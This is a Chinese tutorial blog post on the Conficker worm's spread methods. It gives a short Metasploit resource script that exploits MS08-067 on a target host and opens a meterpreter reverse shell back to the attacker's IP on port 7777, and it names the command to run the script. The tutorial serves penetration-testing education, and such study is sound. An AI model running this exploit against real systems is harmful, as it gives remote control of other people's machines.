码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【Python脚本进阶】2.4、conficker蠕虫(上):Metasploit攻击Windows SMB服务


    目录

    一、简介

    1.1、分析:

    二、Metasploit攻击Windows SMB服务

    2.1、分析:

    2.2、示例:


    一、简介

    1.1、分析:

    在其基本的感染方法中, Conficker蠕虫使用了两种不同的攻击方法。

    1、利用了Windows服务器中一个服务的Oday漏洞。利用这个栈溢出漏洞, 蠕虫能在被感染的主机上执行shellcode并下载蠕虫。

    2、Conficker蠕虫暴力破解默认的管理员网络共享(ADMN$)的口令以获取肉机访问权。



    二、Metasploit攻击Windows SMB服务

    2.1、分析:

    利用Metasploit框架(http://metasploit.com/download/)简化攻击代码。作为一个开源计算机安全项目,很快就被广泛使用, 并且已经变成了一个漏洞利用代码的开发工具包。


    Metasploit能让渗透测试人员在标准化和脚本化的环境中运行数以千计的不同的计算机漏洞利用代码。在Con.ticker蠕虫中使用的漏洞曝光后不久, HDMoore就将一个有效的漏洞利用代码整合进了框架内—-MS08-067 _netapi

    2.2、示例:

    虽然攻击者可以通过交互驱动的方式使用Metasploit, 但Metasploit也能读取批处理脚本(re)完成攻击。在攻击时,Metasploit会顺序执行批处理文件中的命令。


    如使用ms08 _ 067 netapi (Conficker)攻击“ 肉机” (192.168.x.x), 使之与我们自己的主机192.168.xx.xx的7777端口建立一个反向shell

    1. use exploit/windows/smb/ms08_ 067_netapi
    2. set RHOST 192.168.x.x
    3. set PAYLOAD windows/meterpreter/reverse_tcp
    4. set LHOST 192.168.xx.xx
    5. set LPORT 7777
    6. exploit -j -z

    使用Metasploit进行攻击时, 先选好要用的漏洞利用代码(exploit/windows/smb/ms08 _ 067 _ netapi)

    选定目标,目标设置为192.168.1.37

    设定负载为windows/meterpreter/reverse _ tcp

    将反向连接的目标设为主机192.168.77.77, 端口为7777

    最后Metasploit去实施攻击。


    将上面这些代码保存为文件conficker.rc。只要输入命令msfconsole -r conficker.rc, 就能发起攻击。这条命令让Metasploit运行脚本conficker.rc中的指令。如果攻击成功, 会返回一个让我们能控制目标计算机的Windows 命令行shell。

  • 相关阅读:
    【CV】第 8 章:高级物体检测
    Python下载、安装及如何配置Pycharm(Windows 11)详细教程
    【Java】正则表达式,校验数据格式的合法性。
    单链表的实现(单链表的增删查改)
    Unity技术手册-脚本初始(上)
    kubernetes资源管理
    业务流程管理的未来趋势:个性化定制
    Day38—— 509. 斐波那契数 70. 爬楼梯 746. 使用最小花费爬楼梯 (动态规划)
    Java设计模式之模板方法模式
    Linux抓包工具tcpdump
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/126077115
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号